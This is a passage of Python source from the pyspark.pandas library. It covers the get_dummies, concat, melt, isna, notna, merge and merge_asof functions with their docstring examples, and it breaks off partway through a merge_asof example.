Only a single dtype is allowed.\n\n Returns\n -------\n dummies : DataFrame\n\n See Also\n --------\n Series.str.get_dummies\n\n Examples\n --------\n >>> s = ps.Series(list('abca'))\n\n >>> ps.get_dummies(s)\n a b c\n 0 1 0 0\n 1 0 1 0\n 2 0 0 1\n 3 1 0 0\n\n >>> df = ps.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'],\n ... 'C': [1, 2, 3]},\n ... columns=['A', 'B', 'C'])\n\n >>> ps.get_dummies(df, prefix=['col1', 'col2'])\n C col1_a col1_b col2_a col2_b col2_c\n 0 1 1 0 0 1 0\n 1 2 0 1 1 0 0\n 2 3 1 0 0 0 1\n\n >>> ps.get_dummies(ps.Series(list('abcaa')))\n a b c\n 0 1 0 0\n 1 0 1 0\n 2 0 0 1\n 3 1 0 0\n 4 1 0 0\n\n >>> ps.get_dummies(ps.Series(list('abcaa')), drop_first=True)\n b c\n 0 0 0\n 1 1 0\n 2 0 1\n 3 0 0\n 4 0 0\n\n >>> ps.get_dummies(ps.Series(list('abc')), dtype=float)\n a b c\n 0 1.0 0.0 0.0\n 1 0.0 1.0 0.0\n 2 0.0 0.0 1.0\n \"\"\"\n if sparse is not False:\n raise NotImplementedError(\"get_dummies currently does not support sparse\")\n\n if columns is not None and not is_list_like(columns):\n raise TypeError(\"Input must be a list-like for parameter `columns`\")\n\n if dtype is None:\n dtype = \"byte\"\n\n if isinstance(data, Series):\n if prefix is not None:\n prefix = [str(prefix)]\n psdf = data.to_frame()\n column_labels = psdf._internal.column_labels\n remaining_columns = []\n else:\n if isinstance(prefix, str):\n raise NotImplementedError(\n \"get_dummies currently does not support prefix as string types\"\n )\n psdf = data.copy()\n\n if columns is None:\n column_labels = [\n label\n for label in psdf._internal.column_labels\n if isinstance(\n psdf._internal.spark_type_for(label), _get_dummies_default_accept_types\n )\n ]\n else:\n if is_name_like_tuple(columns):\n column_labels = [\n label\n for label in psdf._internal.column_labels\n if label[: len(columns)] == columns\n ]\n if len(column_labels) == 0:\n raise KeyError(name_like_string(columns))\n if prefix is None:\n prefix = [\n str(label[len(columns) :])\n if len(label) > len(columns) + 1\n else label[len(columns)]\n if len(label) == len(columns) + 1\n else \"\"\n for label in column_labels\n ]\n elif any(isinstance(col, tuple) for col in columns) and any(\n not is_name_like_tuple(col) for col in columns\n ):\n raise ValueError(\n \"Expected tuple, got {}\".format(\n type(set(col for col in columns if not is_name_like_tuple(col)).pop())\n )\n )\n else:\n column_labels = [\n label\n for key in columns\n for label in psdf._internal.column_labels\n if label == key or label[0] == key\n ]\n if len(column_labels) == 0:\n if columns is None:\n return psdf\n raise KeyError(\"{} not in index\".format(columns))\n\n if prefix is None:\n prefix = [str(label) if len(label) > 1 else label[0] for label in column_labels]\n\n column_labels_set = set(column_labels)\n remaining_columns = [\n (\n psdf[label]\n if psdf._internal.column_labels_level == 1\n else psdf[label].rename(name_like_string(label))\n )\n for label in psdf._internal.column_labels\n if label not in column_labels_set\n ]\n\n if any(\n not isinstance(psdf._internal.spark_type_for(label), _get_dummies_acceptable_types)\n for label in column_labels\n ):\n raise NotImplementedError(\n \"get_dummies currently only accept {} values\".format(\n \", \".join(\n [cast(Type[DataType], t).typeName() for t in _get_dummies_acceptable_types]\n )\n )\n )\n\n if prefix is not None and len(column_labels) != len(prefix):\n raise ValueError(\n \"Length of 'prefix' ({}) did not match the length of \"\n \"the columns being encoded ({}).\".format(len(prefix), len(column_labels))\n 
)\n elif isinstance(prefix, dict):\n prefix = [prefix[column_label[0]] for column_label in column_labels]\n\n all_values = _reduce_spark_multi(\n psdf._internal.spark_frame,\n [F.collect_set(psdf._internal.spark_column_for(label)) for label in column_labels],\n )\n for i, label in enumerate(column_labels):\n values = all_values[i]\n if isinstance(values, np.ndarray):\n values = values.tolist()\n values = sorted(values)\n if drop_first:\n values = values[1:]\n\n def column_name(v: Any) -> Name:\n if prefix is None or cast(List[str], prefix)[i] == \"\":\n return v\n else:\n return \"{}{}{}\".format(cast(List[str], prefix)[i], prefix_sep, v)\n\n for value in values:\n remaining_columns.append(\n (psdf[label].notnull() & (psdf[label] == value))\n .astype(dtype)\n .rename(column_name(value))\n )\n if dummy_na:\n remaining_columns.append(psdf[label].isnull().astype(dtype).rename(column_name(np.nan)))\n\n return psdf[remaining_columns]\n\n\n# TODO: there are many parameters to implement and support. See pandas's pd.concat.\ndef concat(\n objs: List[Union[DataFrame, Series]],\n axis: Axis = 0,\n join: str = \"outer\",\n ignore_index: bool = False,\n sort: bool = False,\n) -> Union[Series, DataFrame]:\n \"\"\"\n Concatenate pandas-on-Spark objects along a particular axis with optional set logic\n along the other axes.\n\n Parameters\n ----------\n objs : a sequence of Series or DataFrame\n Any None objects will be dropped silently unless\n they are all None in which case a ValueError will be raised\n axis : {0/'index', 1/'columns'}, default 0\n The axis to concatenate along.\n join : {'inner', 'outer'}, default 'outer'\n How to handle indexes on other axis (or axes).\n ignore_index : bool, default False\n If True, do not use the index values along the concatenation axis. The\n resulting axis will be labeled 0, ..., n - 1. This is useful if you are\n concatenating objects where the concatenation axis does not have\n meaningful indexing information. Note the index values on the other\n axes are still respected in the join.\n sort : bool, default False\n Sort non-concatenation axis if it is not already aligned.\n\n Returns\n -------\n object, type of objs\n When concatenating all ``Series`` along the index (axis=0), a\n ``Series`` is returned. When ``objs`` contains at least one\n ``DataFrame``, a ``DataFrame`` is returned. When concatenating along\n the columns (axis=1), a ``DataFrame`` is returned.\n\n See Also\n --------\n DataFrame.join : Join DataFrames using indexes.\n DataFrame.merge : Merge DataFrames by indexes or columns.\n\n Examples\n --------\n >>> from pyspark.pandas.config import set_option, reset_option\n >>> set_option(\"compute.ops_on_diff_frames\", True)\n\n Combine two ``Series``.\n\n >>> s1 = ps.Series(['a', 'b'])\n >>> s2 = ps.Series(['c', 'd'])\n >>> ps.concat([s1, s2])\n 0 a\n 1 b\n 0 c\n 1 d\n dtype: object\n\n Clear the existing index and reset it in the result\n by setting the ``ignore_index`` option to ``True``.\n\n >>> ps.concat([s1, s2], ignore_index=True)\n 0 a\n 1 b\n 2 c\n 3 d\n dtype: object\n\n Combine two ``DataFrame`` objects with identical columns.\n\n >>> df1 = ps.DataFrame([['a', 1], ['b', 2]],\n ... columns=['letter', 'number'])\n >>> df1\n letter number\n 0 a 1\n 1 b 2\n >>> df2 = ps.DataFrame([['c', 3], ['d', 4]],\n ... 
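The loop above is the core of the encoding: one `F.collect_set` per encoded column gathers the distinct values in a single Spark job (`_reduce_spark_multi`), and each sorted value becomes a boolean comparison cast to `dtype`. A minimal sketch of the observable behavior, assuming nothing beyond what the docstring shows:

import pyspark.pandas as ps

psser = ps.Series(list("abca"))
# Internally: distinct values {'a', 'b', 'c'} are collected, sorted, and each
# becomes (psser.notnull() & (psser == value)).astype("byte").
dummies = ps.get_dummies(psser)
dummies_dropped = ps.get_dummies(psser, drop_first=True)  # the values[1:] branch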
columns=['letter', 'number'])\n >>> df2\n letter number\n 0 c 3\n 1 d 4\n\n >>> ps.concat([df1, df2])\n letter number\n 0 a 1\n 1 b 2\n 0 c 3\n 1 d 4\n\n Combine ``DataFrame`` and ``Series`` objects with different columns.\n\n >>> ps.concat([df2, s1])\n letter number 0\n 0 c 3.0 None\n 1 d 4.0 None\n 0 None NaN a\n 1 None NaN b\n\n Combine ``DataFrame`` objects with overlapping columns\n and return everything. Columns outside the intersection will\n be filled with ``None`` values.\n\n >>> df3 = ps.DataFrame([['c', 3, 'cat'], ['d', 4, 'dog']],\n ... columns=['letter', 'number', 'animal'])\n >>> df3\n letter number animal\n 0 c 3 cat\n 1 d 4 dog\n\n >>> ps.concat([df1, df3])\n letter number animal\n 0 a 1 None\n 1 b 2 None\n 0 c 3 cat\n 1 d 4 dog\n\n Sort the columns.\n\n >>> ps.concat([df1, df3], sort=True)\n animal letter number\n 0 None a 1\n 1 None b 2\n 0 cat c 3\n 1 dog d 4\n\n Combine ``DataFrame`` objects with overlapping columns\n and return only those that are shared by passing ``inner`` to\n the ``join`` keyword argument.\n\n >>> ps.concat([df1, df3], join=\"inner\")\n letter number\n 0 a 1\n 1 b 2\n 0 c 3\n 1 d 4\n\n >>> df4 = ps.DataFrame([['bird', 'polly'], ['monkey', 'george']],\n ... columns=['animal', 'name'])\n\n Combine with column axis.\n\n >>> ps.concat([df1, df4], axis=1)\n letter number animal name\n 0 a 1 bird polly\n 1 b 2 monkey george\n\n >>> reset_option(\"compute.ops_on_diff_frames\")\n \"\"\"\n if isinstance(objs, (DataFrame, IndexOpsMixin)) or not isinstance(\n objs, Iterable\n ): # TODO: support dict\n raise TypeError(\n \"first argument must be an iterable of pandas-on-Spark \"\n \"objects, you passed an object of type \"\n '\"{name}\"'.format(name=type(objs).__name__)\n )\n\n if len(cast(Sized, objs)) == 0:\n raise ValueError(\"No objects to concatenate\")\n objs = list(filter(lambda obj: obj is not None, objs))\n if len(objs) == 0:\n raise ValueError(\"All objects passed were None\")\n\n for obj in objs:\n if not isinstance(obj, (Series, DataFrame)):\n raise TypeError(\n \"cannot concatenate object of type \"\n \"'{name}'; only ps.Series \"\n \"and ps.DataFrame are valid\".format(name=type(obj).__name__)\n )\n\n if join not in [\"inner\", \"outer\"]:\n raise ValueError(\"Only can inner (intersect) or outer (union) join the other axis.\")\n\n axis = validate_axis(axis)\n psdf: DataFrame\n if axis == 1:\n psdfs: List[DataFrame] = [\n obj.to_frame() if isinstance(obj, Series) else obj for obj in objs\n ]\n\n level: int = min(psdf._internal.column_labels_level for psdf in psdfs)\n psdfs = [\n DataFrame._index_normalized_frame(level, psdf)\n if psdf._internal.column_labels_level > level\n else psdf\n for psdf in psdfs\n ]\n\n concat_psdf = psdfs[0]\n column_labels: List[Label] = concat_psdf._internal.column_labels.copy()\n\n psdfs_not_same_anchor = []\n for psdf in psdfs[1:]:\n duplicated = [label for label in psdf._internal.column_labels if label in column_labels]\n if len(duplicated) > 0:\n pretty_names = [name_like_string(label) for label in duplicated]\n raise ValueError(\n \"Labels have to be unique; however, got duplicated labels %s.\" % pretty_names\n )\n column_labels.extend(psdf._internal.column_labels)\n\n if same_anchor(concat_psdf, psdf):\n concat_psdf = DataFrame(\n concat_psdf._internal.with_new_columns(\n [\n concat_psdf._psser_for(label)\n for label in concat_psdf._internal.column_labels\n ]\n + [psdf._psser_for(label) for label in psdf._internal.column_labels]\n )\n )\n else:\n psdfs_not_same_anchor.append(psdf)\n\n if 
len(psdfs_not_same_anchor) > 0:\n\n @no_type_check\n def resolve_func(psdf, this_column_labels, that_column_labels):\n raise AssertionError(\"This should not happen.\")\n\n for psdf in psdfs_not_same_anchor:\n if join == \"inner\":\n concat_psdf = align_diff_frames(\n resolve_func,\n concat_psdf,\n psdf,\n fillna=False,\n how=\"inner\",\n )\n elif join == \"outer\":\n concat_psdf = align_diff_frames(\n resolve_func,\n concat_psdf,\n psdf,\n fillna=False,\n how=\"full\",\n )\n\n concat_psdf = concat_psdf[column_labels]\n\n if ignore_index:\n concat_psdf.columns = list( # type: ignore[assignment]\n map(str, _range(len(concat_psdf.columns)))\n )\n\n if sort:\n concat_psdf = concat_psdf.sort_index()\n\n return concat_psdf\n\n # Series, Series ...\n # We should return Series if objects are all Series.\n should_return_series = all(map(lambda obj: isinstance(obj, Series), objs))\n\n # DataFrame, Series ... & Series, Series ...\n # In this case, we should return DataFrame.\n new_objs: List[DataFrame] = []\n num_series = 0\n series_names = set()\n for obj in objs:\n if isinstance(obj, Series):\n num_series += 1\n series_names.add(obj.name)\n new_objs.append(obj.to_frame(DEFAULT_SERIES_NAME))\n else:\n assert isinstance(obj, DataFrame)\n new_objs.append(obj)\n\n column_labels_levels: Set[int] = set(obj._internal.column_labels_level for obj in new_objs)\n if len(column_labels_levels) != 1:\n raise ValueError(\"MultiIndex columns should have the same levels\")\n\n # DataFrame, DataFrame, ...\n # All Series are converted into DataFrame and then compute concat.\n if not ignore_index:\n indices_of_psdfs = [psdf.index for psdf in new_objs]\n index_of_first_psdf = indices_of_psdfs[0]\n for index_of_psdf in indices_of_psdfs:\n if index_of_first_psdf.names != index_of_psdf.names:\n raise ValueError(\n \"Index type and names should be same in the objects to concatenate. 
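When the axis=1 inputs do not share an anchor, the code above falls back to `align_diff_frames`, which joins frame by frame on the index; as in the docstring examples, that path requires the `compute.ops_on_diff_frames` option. A minimal sketch:

import pyspark.pandas as ps
from pyspark.pandas.config import set_option, reset_option

set_option("compute.ops_on_diff_frames", True)
df1 = ps.DataFrame({"a": [1, 2]})
df2 = ps.DataFrame({"b": ["x", "y"]})
wide = ps.concat([df1, df2], axis=1)  # index-joined via the alignment path above
reset_option("compute.ops_on_diff_frames")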
\"\n \"You passed different indices \"\n \"{index_of_first_psdf} and {index_of_psdf}\".format(\n index_of_first_psdf=index_of_first_psdf.names,\n index_of_psdf=index_of_psdf.names,\n )\n )\n\n column_labels_of_psdfs = [psdf._internal.column_labels for psdf in new_objs]\n index_names_of_psdfs: List[List[Optional[Label]]]\n if ignore_index:\n index_names_of_psdfs = [[] for _ in new_objs]\n else:\n index_names_of_psdfs = [psdf._internal.index_names for psdf in new_objs]\n\n if all(name == index_names_of_psdfs[0] for name in index_names_of_psdfs) and all(\n idx == column_labels_of_psdfs[0] for idx in column_labels_of_psdfs\n ):\n # If all columns are in the same order and values, use it.\n psdfs = new_objs\n else:\n if join == \"inner\":\n interested_columns = set.intersection(*map(lambda x: set(x), column_labels_of_psdfs))\n # Keep the column order with its firsts DataFrame.\n merged_columns = [\n label for label in column_labels_of_psdfs[0] if label in interested_columns\n ]\n\n # If sort is True, sort to follow pandas 1.4+ behavior.\n if sort:\n # FIXME: better ordering\n merged_columns = sorted(merged_columns, key=name_like_string)\n\n psdfs = [psdf[merged_columns] for psdf in new_objs]\n elif join == \"outer\":\n merged_columns = []\n for labels in column_labels_of_psdfs:\n merged_columns.extend(label for label in labels if label not in merged_columns)\n\n assert len(merged_columns) > 0\n\n # If sort is True, always sort\n if sort:\n # FIXME: better ordering\n merged_columns = sorted(merged_columns, key=name_like_string)\n\n psdfs = []\n for psdf in new_objs:\n columns_to_add = list(set(merged_columns) - set(psdf._internal.column_labels))\n\n # TODO: NaN and None difference for missing values. pandas seems to be filling NaN.\n sdf = psdf._internal.resolved_copy.spark_frame\n for label in columns_to_add:\n sdf = sdf.withColumn(name_like_string(label), F.lit(None))\n\n data_columns = psdf._internal.data_spark_column_names + [\n name_like_string(label) for label in columns_to_add\n ]\n psdf = DataFrame(\n psdf._internal.copy(\n spark_frame=sdf,\n index_spark_columns=[\n scol_for(sdf, col) for col in psdf._internal.index_spark_column_names\n ],\n column_labels=(psdf._internal.column_labels + columns_to_add),\n data_spark_columns=[scol_for(sdf, col) for col in data_columns],\n data_fields=(psdf._internal.data_fields + ([None] * len(columns_to_add))),\n )\n )\n\n psdfs.append(psdf[merged_columns])\n\n if ignore_index:\n sdfs = [\n psdf._internal.spark_frame.select(psdf._internal.data_spark_columns) for psdf in psdfs\n ]\n else:\n sdfs = [\n psdf._internal.spark_frame.select(\n psdf._internal.index_spark_columns + psdf._internal.data_spark_columns\n )\n for psdf in psdfs\n ]\n concatenated = reduce(lambda x, y: x.union(y), sdfs)\n\n if ignore_index:\n index_spark_column_names = []\n index_names = []\n index_fields = []\n else:\n index_spark_column_names = psdfs[0]._internal.index_spark_column_names\n index_names = psdfs[0]._internal.index_names\n index_fields = psdfs[0]._internal.index_fields\n\n result_psdf: DataFrame = DataFrame(\n psdfs[0]._internal.copy(\n spark_frame=concatenated,\n index_spark_columns=[scol_for(concatenated, col) for col in index_spark_column_names],\n index_names=index_names,\n index_fields=index_fields,\n data_spark_columns=[\n scol_for(concatenated, col) for col in psdfs[0]._internal.data_spark_column_names\n ],\n data_fields=None, # TODO: dtypes?\n )\n )\n\n if should_return_series:\n # If all input were Series, we should return Series.\n if len(series_names) == 1:\n 
name = series_names.pop()\n else:\n name = None\n return first_series(result_psdf).rename(name)\n else:\n return result_psdf\n\n\ndef melt(\n frame: DataFrame,\n id_vars: Optional[Union[Name, List[Name]]] = None,\n value_vars: Optional[Union[Name, List[Name]]] = None,\n var_name: Optional[Union[str, List[str]]] = None,\n value_name: str = \"value\",\n) -> DataFrame:\n return DataFrame.melt(frame, id_vars, value_vars, var_name, value_name)\n\n\nmelt.__doc__ = DataFrame.melt.__doc__\n\n\n@no_type_check\ndef isna(obj):\n \"\"\"\n Detect missing values for an array-like object.\n\n This function takes a scalar or array-like object and indicates\n whether values are missing (``NaN`` in numeric arrays, ``None`` or ``NaN``\n in object arrays).\n\n Parameters\n ----------\n obj : scalar or array-like\n Object to check for null or missing values.\n\n Returns\n -------\n bool or array-like of bool\n For scalar input, returns a scalar boolean.\n For array input, returns an array of boolean indicating whether each\n corresponding element is missing.\n\n See Also\n --------\n Series.isna : Detect missing values in a Series.\n Series.isnull : Detect missing values in a Series.\n DataFrame.isna : Detect missing values in a DataFrame.\n DataFrame.isnull : Detect missing values in a DataFrame.\n Index.isna : Detect missing values in an Index.\n Index.isnull : Detect missing values in an Index.\n\n Examples\n --------\n Scalar arguments (including strings) result in a scalar boolean.\n\n >>> ps.isna('dog')\n False\n\n >>> ps.isna(np.nan)\n True\n\n ndarrays result in an ndarray of booleans.\n\n >>> array = np.array([[1, np.nan, 3], [4, 5, np.nan]])\n >>> array\n array([[ 1., nan, 3.],\n [ 4., 5., nan]])\n >>> ps.isna(array)\n array([[False, True, False],\n [False, False, True]])\n\n For Series and DataFrame, the same type is returned, containing booleans.\n\n >>> df = ps.DataFrame({'a': ['ant', 'bee', 'cat'], 'b': ['dog', None, 'fly']})\n >>> df\n a b\n 0 ant dog\n 1 bee None\n 2 cat fly\n\n >>> ps.isna(df)\n a b\n 0 False False\n 1 False True\n 2 False False\n\n >>> ps.isnull(df.b)\n 0 False\n 1 True\n 2 False\n Name: b, dtype: bool\n \"\"\"\n # TODO: Add back:\n # notnull : Boolean inverse of pandas.isnull.\n # into the See Also in the docstring. It does not find the method in the latest numpydoc.\n if isinstance(obj, (DataFrame, Series)):\n return obj.isnull()\n else:\n return pd.isnull(obj)\n\n\nisnull = isna\n\n\n@no_type_check\ndef notna(obj):\n \"\"\"\n Detect existing (non-missing) values.\n\n Return a boolean same-sized object indicating if the values are not NA.\n Non-missing values get mapped to True. NA values, such as None or\n :attr:`numpy.NaN`, get mapped to False values.\n\n Returns\n -------\n bool or array-like of bool\n Mask of bool values for each element that\n indicates whether an element is not an NA value.\n\n See Also\n --------\n isna : Detect missing values for an array-like object.\n Series.notna : Boolean inverse of Series.isna.\n DataFrame.notnull : Boolean inverse of DataFrame.isnull.\n Index.notna : Boolean inverse of Index.isna.\n Index.notnull : Boolean inverse of Index.isnull.\n\n Examples\n --------\n Show which entries in a DataFrame are not NA.\n\n >>> df = ps.DataFrame({'age': [5, 6, np.NaN],\n ... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),\n ... pd.Timestamp('1940-04-25')],\n ... 'name': ['Alfred', 'Batman', ''],\n ... 
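`isna` above is a thin dispatcher: pandas-on-Spark objects route to their own `isnull`, while scalars and NumPy arrays fall through to `pd.isnull`; `notna` below mirrors this. A short sketch:

import numpy as np
import pyspark.pandas as ps

ps.isna(np.nan)                  # scalar path -> pd.isnull -> True
ps.isna(ps.Series([1.0, None]))  # Series path -> Series.isnull()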
'toy': [None, 'Batmobile', 'Joker']})\n >>> df\n age born name toy\n 0 5.0 NaT Alfred None\n 1 6.0 1939-05-27 Batman Batmobile\n 2 NaN 1940-04-25 Joker\n\n >>> df.notnull()\n age born name toy\n 0 True False True False\n 1 True True True True\n 2 False True True True\n\n Show which entries in a Series are not NA.\n\n >>> ser = ps.Series([5, 6, np.NaN])\n >>> ser\n 0 5.0\n 1 6.0\n 2 NaN\n dtype: float64\n\n >>> ps.notna(ser)\n 0 True\n 1 True\n 2 False\n dtype: bool\n\n >>> ps.notna(ser.index)\n True\n \"\"\"\n # TODO: Add back:\n # Series.notnull :Boolean inverse of Series.isnull.\n # DataFrame.notna :Boolean inverse of DataFrame.isna.\n # into the See Also in the docstring. It does not find the method in the latest numpydoc.\n if isinstance(obj, (DataFrame, Series)):\n return obj.notna()\n else:\n return pd.notna(obj)\n\n\nnotnull = notna\n\n\ndef merge(\n obj: DataFrame,\n right: DataFrame,\n how: str = \"inner\",\n on: Optional[Union[Name, List[Name]]] = None,\n left_on: Optional[Union[Name, List[Name]]] = None,\n right_on: Optional[Union[Name, List[Name]]] = None,\n left_index: bool = False,\n right_index: bool = False,\n suffixes: Tuple[str, str] = (\"_x\", \"_y\"),\n) -> \"DataFrame\":\n \"\"\"\n Merge DataFrame objects with a database-style join.\n\n The index of the resulting DataFrame will be one of the following:\n - 0...n if no index is used for merging\n - Index of the left DataFrame if merged only on the index of the right DataFrame\n - Index of the right DataFrame if merged only on the index of the left DataFrame\n - All involved indices if merged using the indices of both DataFrames\n e.g. if `left` with indices (a, x) and `right` with indices (b, x), the result will\n be an index (x, a, b)\n\n Parameters\n ----------\n right: Object to merge with.\n how: Type of merge to be performed.\n {'left', 'right', 'outer', 'inner'}, default 'inner'\n\n left: use only keys from left frame, like a SQL left outer join; preserve key\n order.\n right: use only keys from right frame, like a SQL right outer join; preserve key\n order.\n outer: use union of keys from both frames, like a SQL full outer join; sort keys\n lexicographically.\n inner: use intersection of keys from both frames, like a SQL inner join;\n preserve the order of the left keys.\n on: Column or index level names to join on. These must be found in both DataFrames. If on\n is None and not merging on indexes then this defaults to the intersection of the\n columns in both DataFrames.\n left_on: Column or index level names to join on in the left DataFrame. Can also\n be an array or list of arrays of the length of the left DataFrame.\n These arrays are treated as if they are columns.\n right_on: Column or index level names to join on in the right DataFrame. Can also\n be an array or list of arrays of the length of the right DataFrame.\n These arrays are treated as if they are columns.\n left_index: Use the index from the left DataFrame as the join key(s). If it is a\n MultiIndex, the number of keys in the other DataFrame (either the index or a number of\n columns) must match the number of levels.\n right_index: Use the index from the right DataFrame as the join key. Same caveats as\n left_index.\n suffixes: Suffix to apply to overlapping column names in the left and right side,\n respectively.\n\n Returns\n -------\n DataFrame\n A DataFrame of the two merged objects.\n\n Examples\n --------\n\n >>> df1 = ps.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [1, 2, 3, 5]},\n ... 
columns=['lkey', 'value'])\n >>> df2 = ps.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [5, 6, 7, 8]},\n ... columns=['rkey', 'value'])\n >>> df1\n lkey value\n 0 foo 1\n 1 bar 2\n 2 baz 3\n 3 foo 5\n >>> df2\n rkey value\n 0 foo 5\n 1 bar 6\n 2 baz 7\n 3 foo 8\n\n Merge df1 and df2 on the lkey and rkey columns. The value columns have\n the default suffixes, _x and _y, appended.\n\n >>> merged = ps.merge(df1, df2, left_on='lkey', right_on='rkey')\n >>> merged.sort_values(by=['lkey', 'value_x', 'rkey', 'value_y']) # doctest: +ELLIPSIS\n lkey value_x rkey value_y\n ...bar 2 bar 6\n ...baz 3 baz 7\n ...foo 1 foo 5\n ...foo 1 foo 8\n ...foo 5 foo 5\n ...foo 5 foo 8\n\n >>> left_psdf = ps.DataFrame({'A': [1, 2]})\n >>> right_psdf = ps.DataFrame({'B': ['x', 'y']}, index=[1, 2])\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True).sort_index()\n A B\n 1 2 x\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True, how='left').sort_index()\n A B\n 0 1 None\n 1 2 x\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True, how='right').sort_index()\n A B\n 1 2.0 x\n 2 NaN y\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True, how='outer').sort_index()\n A B\n 0 1.0 None\n 1 2.0 x\n 2 NaN y\n\n Notes\n -----\n As described in #263, joining string columns currently returns None for missing values\n instead of NaN.\n \"\"\"\n return obj.merge(\n right,\n how=how,\n on=on,\n left_on=left_on,\n right_on=right_on,\n left_index=left_index,\n right_index=right_index,\n suffixes=suffixes,\n )\n\n\ndef merge_asof(\n left: Union[DataFrame, Series],\n right: Union[DataFrame, Series],\n on: Optional[Name] = None,\n left_on: Optional[Name] = None,\n right_on: Optional[Name] = None,\n left_index: bool = False,\n right_index: bool = False,\n by: Optional[Union[Name, List[Name]]] = None,\n left_by: Optional[Union[Name, List[Name]]] = None,\n right_by: Optional[Union[Name, List[Name]]] = None,\n suffixes: Tuple[str, str] = (\"_x\", \"_y\"),\n tolerance: Optional[Any] = None,\n allow_exact_matches: bool = True,\n direction: str = \"backward\",\n) -> DataFrame:\n \"\"\"\n Perform an asof merge.\n\n This is like a left-join except that we match on nearest\n key rather than equal keys.\n\n For each row in the left DataFrame:\n\n - A \"backward\" search selects the last row in the right DataFrame whose\n 'on' key is less than or equal to the left's key.\n\n - A \"forward\" search selects the first row in the right DataFrame whose\n 'on' key is greater than or equal to the left's key.\n\n - A \"nearest\" search selects the row in the right DataFrame who's 'on'\n key is closest in absolute distance to the left's key.\n\n Optionally match on equivalent keys with 'by' before searching with 'on'.\n\n .. versionadded:: 3.3.0\n\n Parameters\n ----------\n left : DataFrame or named Series\n right : DataFrame or named Series\n on : label\n Field name to join on. Must be found in both DataFrames.\n The data MUST be ordered. This must be a numeric column,\n such as datetimelike, integer, or float. 
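The module-level `merge` above simply forwards every argument to `DataFrame.merge`. A minimal sketch of the index-join caveat noted at the end of the docstring (unmatched string cells come back as None rather than NaN):

import pyspark.pandas as ps

left = ps.DataFrame({"A": [1, 2]})
right = ps.DataFrame({"B": ["x", "y"]}, index=[1, 2])
out = ps.merge(left, right, left_index=True, right_index=True, how="left")
# Row 0 has no match, so column B holds None (see the note about #263).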
On or left_on/right_on\n must be given.\n left_on : label\n Field name to join on in left DataFrame.\n right_on : label\n Field name to join on in right DataFrame.\n left_index : bool\n Use the index of the left DataFrame as the join key.\n right_index : bool\n Use the index of the right DataFrame as the join key.\n by : column name or list of column names\n Match on these columns before performing merge operation.\n left_by : column name\n Field names to match on in the left DataFrame.\n right_by : column name\n Field names to match on in the right DataFrame.\n suffixes : 2-length sequence (tuple, list, ...)\n Suffix to apply to overlapping column names in the left and right\n side, respectively.\n tolerance : int or Timedelta, optional, default None\n Select asof tolerance within this range; must be compatible\n with the merge index.\n allow_exact_matches : bool, default True\n\n - If True, allow matching with the same 'on' value\n (i.e. less-than-or-equal-to / greater-than-or-equal-to)\n - If False, don't match the same 'on' value\n (i.e., strictly less-than / strictly greater-than).\n\n direction : 'backward' (default), 'forward', or 'nearest'\n Whether to search for prior, subsequent, or closest matches.\n\n Returns\n -------\n merged : DataFrame\n\n See Also\n --------\n merge : Merge with a database-style join.\n merge_ordered : Merge with optional filling/interpolation.\n\n Examples\n --------\n >>> left = ps.DataFrame({\"a\": [1, 5, 10], \"left_val\": [\"a\", \"b\", \"c\"]})\n >>> left\n a left_val\n 0 1 a\n 1 5 b\n 2 10 c\n\n >>> right = ps.DataFrame({\"a\": [1, 2, 3, 6, 7], \"right_val\": [1, 2, 3, 6, 7]})\n >>> right\n a right_val\n 0 1 1\n 1 2 2\n 2 3 3\n 3 6 6\n 4 7 7\n\n >>> ps.merge_asof(left, right, on=\"a\").sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a 1\n 1 5 b 3\n 2 10 c 7\n\n >>> ps.merge_asof(\n ... left,\n ... right,\n ... on=\"a\",\n ... allow_exact_matches=False\n ... ).sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a NaN\n 1 5 b 3.0\n 2 10 c 7.0\n\n >>> ps.merge_asof(\n ... left,\n ... right,\n ... on=\"a\",\n ... direction=\"forward\"\n ... ).sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a 1.0\n 1 5 b 6.0\n 2 10 c NaN\n\n >>> ps.merge_asof(\n ... left,\n ... right,\n ... on=\"a\",\n ... direction=\"nearest\"\n ... ).sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a 1\n 1 5 b 6\n 2 10 c 7\n\n We can use indexed DataFrames as well.\n\n >>> left = ps.DataFrame({\"left_val\": [\"a\", \"b\", \"c\"]}, index=[1, 5, 10])\n >>> left\n left_val\n 1 a\n 5 b\n 10 c\n\n >>> right = ps.DataFrame({\"right_val\": [1, 2, 3, 6, 7]}, index=[1, 2, 3, 6, 7])\n >>> right\n right_val\n 1 1\n 2 2\n 3 3\n 6 6\n 7 7\n\n >>> ps.merge_asof(left, right, left_index=True, right_index=True).sort_index()\n left_val right_val\n 1 a 1\n 5 b 3\n 10 c 7\n\n Here is a real-world times-series example\n\n >>> quotes = ps.DataFrame(\n ... {\n ... \"time\": [\n ... pd.Timestamp(\"2016-05-25 13:30:00.023\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.023\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.030\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.041\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.049\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.072\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.075\")\n ... ],\n ... \"ticker\": [\n ... \"GOOG\",\n ... \"MSFT\",\n ... \"MSFT\",\n ... \"MSFT\",\n ... \"GOOG\",\n ... \"AAPL\",\n ... \"GOOG\",\n ... \"MSFT\"\n ... 
